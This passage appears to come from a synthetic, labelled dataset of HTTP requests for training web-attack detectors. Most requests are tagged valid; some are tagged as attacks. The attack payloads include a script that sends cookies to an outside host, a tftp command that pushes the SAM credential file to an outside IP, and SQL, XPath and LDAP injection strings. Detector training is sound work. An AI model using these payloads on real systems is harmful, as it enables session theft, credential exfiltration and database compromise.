Proxy-Authorization: NTLM cG8wZVJ4ZmZ1bjc2c1RsYU5kblRzT2R0aW5Ib290b3A1
Authorization: Digest realm
Referer: http://d3eaJjSd.cz/1osh53o/iityl.php4
TE: trailers,deflate;q=0.0
Trailer: Upgrade
User-Agent: saEpu0yhA/2.2.7.2.2
UA-OS: Win98
UA-Pixels: 4835x5695
Via: HTTP/2.9 www.nadel.tiff, 6.9 155.196.119.58:4, 6.0 48.133.224.102
Transfer-Encoding: hstcR; aenausut=sttkd
Upgrade: llre/7.7, ldlseg/5.7
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 24256159613993344
----: ------------------------------------------------

null

End - Id: 42881
Start - Id: 24329
class: Valid
GET /e9z/wTdL9sts2hecNt/s1CVA-dLwGVx.asp? HTTP/1.1
Host: www.nnstzqrhe.fr
Connection: ixenne
Accept: audio/*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 203.77.28.44
Cookie: vz=khNnireyaon;47sios=03718067
Cookie2: $Version="859"
Date: Mon, 23 Jan 06 21:21:28 UTC
ETag: "WG4ET8aLtnpGZfQSjuAb"
Expect: xbdexcia
From: euoirM@EiaLnegsw.de
If-Modified-Since: Mon, 06 Feb 06 10:18:48 UTC
If-Unmodified-Since: Sat, 06 Sep 08 23:10:56 CET
If-Match: "c2Tyv3dN5TA2zQ63h2Tk"
If-None-Match: "24TNGu7ug1Oy-JD"
If-Range: "-kgiEXLPAUJJ7k_SI"
Max-Forwards: 98
MIME-Version: 9.0
Pragma: naf='ic'
Proxy-Authorization: sdipe ouneodh=Rermt
Authorization: Digest opaque="cdXneh"
Range: 71131-,-09407
Referer: /ntSia4bw/ib1nAt3/46swetC/rote.tiff
TE: gzip
Trailer: Referer
User-Agent: Mozilla/9.4 (Windows; U; Win98 3.0; dt-eN; rv:1.5.3) Gecko/18921103
UA-CPU: StrongARM
UA-Disp: 515,9191,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 352x5203
Via: 9.5 145.154.134.153:51883, trth/4.0 www.at3sucrh.html, FTP/3.7 27.25.48.247
Transfer-Encoding: gzip
Upgrade: sslO/7.2
Warning: 105 www.sufpd.png "yETnplldg" "Wed, 31 Oct 07 17:21:26 GMT"
X-Forwarded-For: 70.46.109.196
X-Serial-Number: 32982320313
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24329
Start - Id: 17264
class: Valid
GET /TElFY/3idXl8ted7tt/h8iu/at8xft/eRqi5SZg5PG/eFFx6jGd/eDVpKTGcY5_6tcVsXd/dmeedOatd7nf/ksZmetav1/h2hertdsqhpoli3t/tT4VTdziZOWD9.htm?ajeontu=40&nunnt=209988&ehpau3e=okJyvCyntd&ernwnav=sYw3qs.K57t&rrgs=735575&t1ogdactnst=530 HTTP/1.0
Host: 198.179.2.94
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 241.164.164.126
Cookie: fah=anlgjnhasihn;ooocraoufekrehn=yV69yxLSoHu
Cookie2: $Version="4"
Date: Wed, 03 May 06 16:28:51 CET
ETag: "wg.hSonULX4HNFD@ox"
Expect: 8r0cEafD
From: cvrnce@Setoelnto.ch
If-Modified-Since: Mon, 12 Oct 09 17:07:41 CET
If-Unmodified-Since: Thu, 15 Jun 06 13:27:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 563
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dnRuamVzdGE6dGF0dGhlZQ==
Authorization: NTLM ZW9IaFRqYWFmaGFkbGRsZnV5bnJvQWZtZ25sc3loeHdyRXVweg==
Range: -986,9134-
Referer: /aoshv/henp.jpg
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: m4naaarD1weamn
UA-CPU: StrongARM
UA-Disp: 9714,1631,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8061x129
Via: 6.8 www.grtd.gif, FTP/1.8 www.wnenCad.gif, FTP/7.2 www.1nnf3r.gif
Transfer-Encoding: vjRohe
Upgrade: omut/4.3, 2v0hp/4.8
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 835471798337
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17264
Start - Id: 20990
class: Valid
GET /ewSub0lcKmqKH@3.5/isqgnata/ehrdwomqtr1ftt/ue3ao1uSA/teA_gBgh5-@RYu/peN7l/TznJ6B/ttIi/aahii.cfm? HTTP/1.0
Host: www.or3Fa.be
Connection: lsshie
Accept: */*;q=0.6
Accept-Charset: cp-936, windows-1251, euc-cn
Accept-Encoding: *
Accept-Language: Bz5-j;q=0.4, wdErd7-w, cKf-tRt, um-82, Lyaae-lapheL
Cache-Control: no-transform
Client-ip: 169.27.197.117
Cookie: iKb9af=g9l;mqi6meod=eojs(t;oelbosohcJ=3ddv5Eslijfnr0is;rt9odlcTlDthnut=eogurtSnn y>pftn
Cookie2: $Version="080"
Date: Wed, 16 Jun 04 07:13:56 UTC
ETag: "S7dOFY9qGkegqB6"
Expect: 100-continue
From: ahynt@dfll.st
If-Modified-Since: Sat, 19 Jul 08 19:53:35 GMT
If-Unmodified-Since: Wed, 11 Mar 09 15:59:15 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 06
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: taay MaVfmd=b1vtgae
Authorization: NTLM b2lhcTNna3Roc2RldGRjdGRlbnFhQUl6c25TaW0xaG95b3k=
Range: 8-7,-0713,855020-
Referer: /jscoun/yeldntg.htm
TE: trailers,chunked;q=0.3
Trailer: Pragma
User-Agent: Mozilla/5.1 (Windows; U; Win 9x 3.0; tn-ng; rv:9.7.6) Gecko/08211644
UA-CPU: 68000
UA-Disp: 665,0570,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 358x903
Via: FTP/1.9 167.125.154.3, FTP/3.2 www.AsrEhwea.jpg, FTP/3.3 www.sAle.gif
Transfer-Encoding: compress
Upgrade: wrn/1.7, tal/7.3, xhsnbh/3.1, taut/3.1
Warning: 723 www.jqsOhsod.jpeg "oaec" "Mon, 17 May 04 15:05:20 GMT"
X-Forwarded-For: 124.152.206.172
X-Serial-Number: 72612328248662320095
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20990
Start - Id: 24954
class: Valid
GET /5qgADSBKp_/inKSSO/bylidltrs225Tslhh/HemhoUlmgeiat/msPuZ55mdZm8.s.css?temoseBdeaaD4s=yuwins&0se1=71&65szgeooety=%29&VmJJ_FVn=8814&a5=0eehletpatriq7T HTTP/1.1
Host: www.lAted.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 115.80.65.226
Cookie: xmr=fNNiFujjh;0re= +
Cookie2: $Version="231"
Date: Thu, 27 Oct 05 01:53:08 CET
ETag: W/"NKO48dG07u4SmpU"
Expect: Oitfhn6n=epeln
From: iefmllR@anati.de
If-Modified-Since: Sun, 25 Nov 07 10:47:17 GMT
If-Unmodified-Since: Wed, 02 Nov 05 05:27:27 UTC
If-Match: "kJm9oWSvONaLohpR6"
If-None-Match: "6q7fPJucTdIQXOl@fAr"
If-Range: Thu, 22 Jul 04 20:58:34 CET
Max-Forwards: 4499
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM N2hJbmNVc25lZm5hb2N5YXNzZXNzOTNIbmFuZXRlc2FvN25ldQ==
Authorization: 44iAtI ali0h0b=7zttr
Range: -47448,86125-296,-084
Referer: http://www.tran.biz/hIrRut/aiajs1i/tibttdh/nla5rpg.asmx
TE: trailers,trailers
Trailer: Trailer
User-Agent: ootsf/7.7.0.1
UA-CPU: Sparc
UA-Disp: 029,002,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 778x801
Via: 4.7 www.4k0s.js:800, HTTP/1.0 25.80.135.149:7882
Transfer-Encoding: gzip
Upgrade: 3bda/0.6, httrt3/8.5, bqt/6.9
Warning: 600 181.184.51.145:71774 "Unseeh" "Tue, 06 Apr 10 02:46:59 UTC"
X-Forwarded-For: 86.74.11.156
X-Serial-Number: 2466804840974150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24954
Start - Id: 46505
class: XSS
GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.0
Host: www.reasTEro.cz:86187
Connection: nddlov
Accept: video/quicktime
Accept-Charset: *;q=0.5
Accept-Encoding: deflate
Accept-Language: *;q=0.3
Cache-Control: eohn1=y
Client-ip: 200.157.87.196
Cookie: txse=mwisoeEasoets;ymcteevtn=rdit0)ajevaltteiRT8tio;uioeq9raRsieh=2162157
Cookie2: $Version="761"
Date: Thu, 04 Feb 10 11:37:46 CET
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: otetPscl
From: piteR@trksge.gov
If-Modified-Since: Thu, 30 Apr 09 09:54:53 CET
If-Unmodified-Since: Fri, 30 Apr 04 15:21:31 GMT
If-Match: "a9y9kqdibKguyc6"
If-None-Match: *
If-Range: "4Arrm0d@fEkZnnw"
Max-Forwards: 2521
MIME-Version: 0.6
Pragma: egaet=ep
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic b1czY3BzOm5jaWh5Yg==
Range: 8817-695585,1-
Referer: /jwq9qc/sih0ac/mtiut.sh
TE: chunked,trailers
Trailer: Date
User-Agent: sIAnCjyRrE http://www.osmwm.st
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: FTP/6.1 236.209.231.19
Transfer-Encoding: emAa; ixUng=u0dtwh
Upgrade: lNa/8.0, nnchdy/2.1, q9de/3.4, se9N7o/1.4
Warning: 262 www.ooeoh.jpg "ehAoh" 
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46505
Start - Id: 5142
class: Valid
PUT /l8iriereeo6eayibise/Sd/MilO3astnrelct/aijVVOEzzs/oMz3v/zeklxZMPYU_o/xtnzaekeeei/wuROUR/a2nsosm0IoXpE2tosrt/hwT.CAH3V_WhGcOdw/iDjTmS13ZPRyPLq5L.jpeg? HTTP/1.1
Content-Length: 154
Content-Language: rnets,eslecgsr,6uiE
Content-Encoding: deflate
Content-Location: http://inyi.biz/u0tak7tn/ocxD/8maAtps/w9nsn.msf
Content-MD5: aXRuYXdwZGh0cm50aWFvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Feb 09 17:20:42 UTC
Last-Modified: Fri, 02 Oct 09 20:24:52 GMT
Host: www.crsa.st
Connection: e9nIh
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, deflate, compress;q=0.6, identity;q=0.4
Accept-Language: *;q=0.3
Cache-Control: max-age=4397
Client-ip: 210.230.20.45
Cookie: niqa07=/nee
Cookie2: $Version="7"
Date: Sun, 18 Apr 04 17:53:00 UTC
ETag: W/"o2nqAtp.BofepO1a5j"
Expect: 100-continue
From: daodwiso@rGHdclsrni.org
If-Modified-Since: Wed, 27 Apr 05 18:25:12 CET
If-Unmodified-Since: Wed, 08 Feb 06 03:42:24 CET
If-Match: "zjMTRPLjiGA1LwrNIl"
If-None-Match: "H4XanErrEbe2VsHELUh"
If-Range: Sun, 06 Aug 06 07:26:50 UTC
Max-Forwards: 1
MIME-Version: 5.3
Pragma: s3uWuo5y='hohs'
Proxy-Authorization: eNsit aneo7=ietstf
Authorization: NTLM ZU5kc3Ryb2VkVGJpenllM2c3ZTNsYWEyZjhMZWxpY3VnZXJuOWE5Yg==
Range: -00275
Referer: http://U73supc.it/latc/llrd/msaeeaen/sgtypi/ydsi.pl
TE: deflate;q=0.0,trailers
Trailer: Transfer-Encoding
User-Agent: hPpW1G9 http://www.rellZO.uk
UA-CPU: MIPS
UA-Disp: 279,387,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9541x8110
Via: 1.9 www.rlt3.js, 4.5 216.171.243.49, 0.4 239.208.184.50:2
Transfer-Encoding: compress
Upgrade: pnpc/1.3, oTfn/4.8
Warning: 224 227.126.233.183 "ehAds4enRxnay" 
X-Forwarded-For: 199.181.19.164
X-Serial-Number: 64870443961077
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

@4y9dJFYQ=12800&neeraadxigYr5h=rhE&jjehosarftrlee=96&sp0tttda=57623188&5RrWLIYZKAo=310373289&yni=68082145&05uA=ooI4H.XAJG&ceodmmtebto=f0r%l&ushraaf=hh9f

End - Id: 5142
Start - Id: 48641
class: XPathInjection
PUT /likeDu81scripta5YexecZoX/IJ77/433w@ORZ/26qwp-passthru4/aJHCVUyy-F0NKQb_7fS7/lUpPG5Boyf6/062reUH/V679j6SHB36C.msf? HTTP/1.0
Content-Length: 168
Content-Language: eec,wyyt3e
Content-Encoding: compress
Content-Location: http://siguiot.be/Tdaf5L0k/teiod/igtc/jhvn.gif
Content-MD5: aGF3dmZTMmRvYXN0aXVkNA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Apr 07 22:41:37 GMT
Last-Modified: Mon, 21 Jul 08 15:39:47 GMT
Host: 113.233.164.178
Connection: etnoeF
Accept: video/quicktime;q=0.4
Accept-Charset: iso-2022-jp, x-mac-ce, x-mac-chinesetrad;q=0.2
Accept-Encoding: *
Accept-Language: epx8dsl-afk;q=0.2
Cache-Control: no-store
Client-ip: 41.88.127.250
Cookie: SI6xmlIhU=6889386;xen6cnc=m"i4cIlipobjectoOSs]rr;btI5htii=8854978
Cookie2: $Version="469"
Date: Tue, 19 May 09 20:48:38 UTC
ETag: W/"YKFJkoH9cKAkRI90WU"
Expect: 100-continue
From: tyxcwa@tsnhtl.be
If-Modified-Since: Tue, 12 Feb 08 09:14:37 UTC
If-Unmodified-Since: Thu, 02 Oct 08 06:01:31 CET
If-Match: "tKo3CfOljuMbKZd1"
If-None-Match: "mF.zJ7@79eTsgSS8"
If-Range: Tue, 18 Jul 06 06:34:57 GMT
Max-Forwards: 3520
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic bGFhZTpubFJpMG5lYw==
Range: -046912,8351-4,007308-22
Referer: http://www.yyro2l4e.st/s9mh6aq.msf
TE: gzip;q=0.1,trailers
Trailer: Warning
User-Agent: pmtL5edr
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: FTP/8.3 www.u3ldr.html
Transfer-Encoding: compress
Upgrade: ohth/5.2
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 36007
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qNOhcbgtTcscn=01210381&CT0aoXgot9iat4n=25578313&h4bett=aa'    or     path/child::node()[position()=N]   or 'dd6tqgro'   = '&execimgVxB0A=1

End - Id: 48641
Start - Id: 46767
class: XSS
POST /3PpDCvBrVNPubi/1S/4vdwt/az/aiqGSI3kRMd/i77dgwT3S.html? HTTP/1.1
Content-Length: 233
Content-Language: otahrxmt,o
Content-Encoding: gzip
Content-Location: http://wmbetsao.ch/srra/cpeeows/imtft/tNh9av/etnI9.jpg
Content-MD5: N2NwZThlZW54aWhzVHJpeA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 10:02:06 UTC
Last-Modified: Mon, 31 Jan 05 16:26:38 GMT
Host: www.0nre.be:9199
Connection: close
Accept: */*;q=0.4
Accept-Charset: utf-7, iso-2022-jp;q=0.1, cp-932;q=0.6, euc-kr, windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 202.152.82.23
Cookie: ielSyYRCseeeal=ropt
Cookie2: $Version="4"
Date: Fri, 10 Sep 04 24:38:07 UTC
ETag: "uvWwqLBwApGZcIhP"
Expect: feazi6
From: dyenT@gpt6glsG.cz
If-Modified-Since: Thu, 22 May 08 06:18:58 UTC
If-Unmodified-Since: Mon, 03 May 10 03:41:21 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Oct 09 09:58:38 GMT
Max-Forwards: 4
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: o1svi Elj40=bhoesO1
Authorization: 8eeq bSihE=Gspcil
Range: -03,-42983
Referer: /dffegneK.mp3
TE: deflate
User-Agent: Mozilla/7.6 (compatible; MSIE 6.9; Linux i586; Phdlnn; 385nyn; zuGer7r6)
UA-Color: color32
UA-Pixels: 1199x1516
Via: FTP/2.3 www.Edityfik.js, Ar9s/1.7 90.180.35.219, 7.8 www.a4Ieoorn.jpg
Transfer-Encoding: deflate
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 183.74.153.68
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

52Kall4K=<img  src    ="livescript:[document.location.replace('http://www.ch.com/cgi-bin/ri.cgi'+document.cookie);] "   >&E9m=tRIMH.Omt&nbrkhtuprttaMzd=select4&DHncjNgXlink=oz iby(Hnetcat8e|h

End - Id: 46767
Start - Id: 42785
class: SqlInjection
PUT /eih/d@im/sWt4c4/cgdajncnsart/3haron7ebnfiurbeMt/copyc/ukm0aizde4b/aLdL.png? HTTP/1.0
Content-Length: 317
Content-Language: elsqjb,sttrg,j3
Content-Encoding: deflate
Content-Location: http://www.ycydee.net/sDsrh/inen45yw/aaeOs/jriH4d.bin
Content-MD5: bWxocWNpamlhZE5ObmFvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Nov 06 17:00:50 UTC
Last-Modified: Thu, 23 Jul 09 18:49:11 CET
Host: 67.212.40.183:80
Connection: vOgee
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 54.46.97.168
Cookie: 3laaa= a8;ed6=6w14U;smebrslas=s3TZlcKacq3l;el5o=01074     or    id>2 or  ls_id<887510
Cookie2: $Version="436"
Date: Sat, 12 Sep 09 04:52:12 UTC
ETag: "jiRoFKzzufSpQ8IuWI"
Expect: 100-continue
From: tchoc@di1ltcs.biz
If-Modified-Since: Sun, 28 Jan 07 01:29:50 CET
If-Unmodified-Since: Sat, 08 Jan 05 07:16:03 CET
If-Match: "jzEpY8iT6hM7dhYjQ6"
If-None-Match: "KX2.WE.8Z_FeHmt0"
If-Range: *
Max-Forwards: 3
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: ccaa HoVpt=otjQ
Authorization: Basic bGFzc2d6bjo3Y2ppc2U2Ng==
Referer: http://rowenbs.biz/3tanoan/aaWti/wjetJai/ri1A/aeepi.php3
TE: gzip;q=0.3,chunked
Trailer: Expect
User-Agent: e0e6h8uaC
UA-CPU: x86
UA-Disp: 3032,464,8
UA-Pixels: 6360x1406
Via: FTP/3.4 www.ilhqfyu.htm, 5.7 85.121.144.210:146, 2.7 162.252.100.39
Transfer-Encoding: gzip
Upgrade: doh/4.6, sv4t/6.6
Warning: 626 www.re0rhabi.js "haResnnenteioneexio1" 
X-Serial-Number: 458954638
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

hTlaWzIl=etiriahd0&H3x8Ptg5a=yP&ov0elefmetseoe=d18@oJ&e1seaaNterJayo=lnJjUet4oaha&as3tnti=hnoSskvioez&Eahn2vderlos=27&SO5Q5Avar0itgI=6eedi0lhomev&aRmrdChESi=rxi&Dcq=oechowEnullee(e0my'Me$khhp&dcyaysfkhdihyja=a&hD%a&srosdhdgi=rySLzJ5gc&brbae=15722&oeos1pTeiotLo=06&rcodeinW0b=tj4YuuWNkG&2ARtOeanDEene=v0het

End - Id: 42785
Start - Id: 21417
class: Valid
GET /oEcA0rIEvUMyQ6WZT0xQ/f7mB3fsiQM3dtWZ/sjLV_5qbQPK5fJ@TfPY2/ehevt6Hincep/hgIFW1Gh/iJCk2Zb@D6rE.png?H_nullHNUT=u%5De&nTeey=ao&iheuBmhlrrta9l=8Q_9qQ4%40ccjC&nahHrmrsmIoweUy=er%28E&coL=wi&ati6=m&positionPKmU0=o&sPUlb=744201&rbalUaad7uctt8c=038112&xp_bgsounddropOm=a7&eth=edkwqtahdtaxTagm&Iephimt6=on%3B61q+limgw8neUm%3Cpasswd&uEpH4Ssock_streamformd=tneotslr HTTP/1.0
Host: 214.172.200.87:97
Connection: 4Dlei
Accept: */*;q=0.4
Accept-Charset: shift_jis;q=0.2, big5;q=0.0
Accept-Encoding: compress;q=0.2, identity;q=0.7, gzip, compress;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 47.229.62.23
Cookie: ihdttroeuslMe=e3sri;eoet=s;nztanoeaeorAe=hDD5IJ;q4connectHO=hbcSbodyhetexi;B-ywo=eArO5vm3mQ
Cookie2: $Version="1"
Date: Mon, 20 Oct 08 20:40:02 CET
ETag: "lQurpWdSyUb3BcSKkDPs"
Expect: mrae
From: s97aa@bEgmrdes.biz
If-Modified-Since: Mon, 24 Oct 05 22:39:59 CET
If-Unmodified-Since: Sun, 17 Aug 08 13:11:23 UTC
If-Match: "-hoe94k@E_mVr0uMr"
If-None-Match: "Xa@MkwqEVRPSRvd2INk."
If-Range: *
Max-Forwards: 75
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic aG11YXNzc3g6aHM3bHJyaGg=
Range: 9389-552,913284-,86-
Referer: http://utvN.de/Diai/TeoeNtne/ait8oidy.exe
TE: trailers,chunked;q=0.6
Trailer: Max-Forwards
User-Agent: iEOJkT http://www.jAw8oei.be
UA-CPU: Sparc
UA-Disp: 6376,0383,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 528x4272
Via: 3.7 www.RteyCEe.png, 6lrRil/0.3 www.xxpndonr.js, 7.8 156.65.117.45
Transfer-Encoding: compress
Upgrade: O9a1kz/8.8, oleC/5.4, shee/7.3
Warning: 217 7.232.161.211 "en9ruae" 
X-Forwarded-For: 62.14.229.148
X-Serial-Number: 2418413
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21417
Start - Id: 38817
class: LdapInjection
GET /hte6ixe/aeIYKZ4rBWfjpHL5qhd/dedie60si8cNi0ije/ou71rrsayifnnsitshrs.css?oetreei=lGa&o4tyhrwaaheao=%29+++%28++%7C+%28displayName%3Dhad*%29+%28name%3D++had*++++%29%28++mail%3Dhad*++++%29&nBAZg=80155414&ef2=mnp%40BGu&itxlDX=5363 HTTP/1.1
Host: www.tfkenn.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=19556
Client-ip: 166.96.232.49
Cookie: aFhTga7drms=Dntrtoco(sd;ikmhqtrwrtXf=2;3ba8toVI=a6easmi04obsa1mgu;uGtythlAhaeo=7;hveneoyy3=vinput
Cookie2: $Version="4"
Date: Sat, 25 Jun 05 06:36:48 CET
ETag: W/"XO.R8JWcEWuUM9wv"
Expect: 100-continue
From: Emhleev@7nsic.de
If-Modified-Since: Fri, 21 Dec 07 14:56:18 GMT
If-Unmodified-Since: Sun, 08 Aug 04 09:39:35 GMT
If-Match: ".WmLAjIX6y.c4kgKWj.M"
If-None-Match: "fkoWpz9bar71KXRdn"
If-Range: Sun, 17 Aug 08 14:03:29 GMT
Max-Forwards: 536
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Basic cm1UcTpJZWJlYXJh
Range: 635-4999,578-28594,-3
Referer: /btiddei/oeaa/se5ml/tNnt8dh/4Odeau.php4
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 3.9; ue-fi; rv:3.8.2) Gecko/71045548
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: 4.7 www.eaeuoi3g.htm, HTTP/7.4 164.138.4.82, 3.5 www.te6tc.shtml
Transfer-Encoding: tPiVt; ueAtt=isolelc
Upgrade: ctrbt/2.3, eLc/5.5, Tey/4.2, adeltf/5.1
Warning: 659 www.rhdhc.htm "uoftereRIuwgtWj" "Wed, 06 Aug 08 14:08:03 CET"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38817
Start - Id: 1551
class: Valid
GET /FnDrmU1ly/ercenrOLnegolgt1uu.php3? HTTP/1.1
Host: 112.81.182.201
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.9, identity;q=0.3, compress;q=0.3
Accept-Language: 9wR-nreht;q=0.5
Cache-Control: max-age=137
Client-ip: 139.146.235.78
Cookie: tyseb=1336
Cookie2: $Version="374"
Date: Wed, 17 Feb 10 01:08:43 GMT
ETag: "PjSX4lqqUOqurFvPs4P"
Expect: meYira=tis4mexm;eieUm
From: uared@sesbwap.com
If-Modified-Since: Sat, 27 Aug 05 09:57:07 UTC
If-Unmodified-Since: Mon, 27 Apr 09 22:24:11 CET
If-Match: "CHNifSYLTNNeYqLg"
If-None-Match: *
If-Range: "z1X_9slu1Ebw24NvaWa"
Max-Forwards: 0210
MIME-Version: 8.2
Pragma: ta=8teene
Proxy-Authorization: Basic b3lvcnJVenI6VWRIMUQ=
Authorization: NTLM ZHNwdXljcGRxb2hpcmw2eTJkdDNsc3Nsb3R0aWl4cmE=
Range: -16609
Referer: /tcaPo/i5tieu/wzeh/28eptso/wsOiWuuT.mpg
TE: trailers
Trailer: Accept-Charset
User-Agent: eamsqeodkt/1.8.1
UA-CPU: StrongARM
UA-Disp: 048,2159,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7934x8697
Via: 9.4 www.onennt7.js
Transfer-Encoding: compress
Upgrade: ameA/9.9, rzoIer/1.8, llO2/3.9, Oyt/1.5
Warning: 172 www.gicpsf4l.css "oo512" "Thu, 06 Jul 06 16:00:23 UTC"
X-Forwarded-For: 223.124.189.8
X-Serial-Number: 2858071636366715430
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1551
Start - Id: 44562
class: OsCommanding
GET /rXZT993AWO-/Q0a3/nKZ/wxterm/t6j/o9_kYpyM.htm?rse5Raeee=aYm&fa=09595115&t2lotolivekoaTh=eeul&D8q-Hg%ufYs4r=teaWAqdgt_A&PsYXwHscript0dJJk0=7&0ezhrfs=edaGfe9ustu&faerqtteochsdta=aibgsoundocvofromnhlinkt%3Aobretc%29&auasrRaiEi=aMn+ewavuc&eeIe=3&RdeeeS8oh8teo=t&rR8.kscriptH.7WG=obS0aVR HTTP/1.0
Host: www.ltiDn.cz
Connection: hnae
Accept: */*;q=0.1
Accept-Charset: us-ascii
Accept-Encoding: compress, identity, identity, identity, identity;q=0.8
Accept-Language: *
Cache-Control: no-store
Cookie: 4stsa=i;TyfflTcfaoyd=206.176.243.137|    tftp     -i 51.4.81.225   PUT sam._
Cookie2: $Version="160"
Date: Sat, 31 Jan 09 24:38:52 CET
If-Modified-Since: Tue, 15 Sep 09 05:02:41 UTC
If-Unmodified-Since: Thu, 14 Apr 05 01:23:22 UTC
If-Match: *
If-Range: Wed, 23 Aug 06 04:14:02 UTC
Max-Forwards: 05
MIME-Version: 1.6
Pragma: es='vlnoR'
Proxy-Authorization: Digest cnonce="aktaiE"
Referer: http://www.esptode.be/egsem6.bin
User-Agent: Mozilla/7.9 (Windows; U; Windows NT 9.5; 0u-He; rv:1.7.7) Gecko/40906803
UA-OS: Windows 98
Via: HTTP/2.4 www.pTlnyib.png
Warning: 061 239.241.240.236 "rLtasiuxrass" 
----: ---------------------------------------

null

End - Id: 44562
Start - Id: 5025
class: Valid
PUT /fx@0P/im7t1thdlqruhm/scIIzpX/eIoJHdMuAy@K/ifLsFeJ6x/lserlQvEmearor0fovpa/g8447h-G7DFjBc8y/hyet.shtml? HTTP/1.1
Content-Length: 151
Content-Language: roneei,omggh7
Content-Encoding: compress
Content-Location: http://etSd1.st/desh/srcNfro/yeefu/Enamo.mpeg
Content-MD5: bml5aXBlaGx5ZG5Hc2RqZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Jul 06 18:10:30 UTC
Last-Modified: Wed, 06 Feb 08 10:31:32 GMT
Host: 164.86.223.40:80
Connection: close
Accept: video/*
Accept-Charset: windows-874;q=0.0, windows-1258, windows-1255, windows-1251;q=0.6
Accept-Encoding: identity;q=0.2, deflate, compress;q=0.7, gzip
Accept-Language: *
Cache-Control: min-fresh=96540
Client-ip: 122.44.235.75
Cookie: biebp=4HcvwWMZe
Cookie2: $Version="23"
Date: Wed, 13 Oct 04 06:49:02 CET
ETag: "arxd.GetOL1VZFQ8"
Expect: rjidLy=lcseE5h
From: anypee@kdrqiteI.it
If-Modified-Since: Tue, 17 Jan 06 22:36:04 GMT
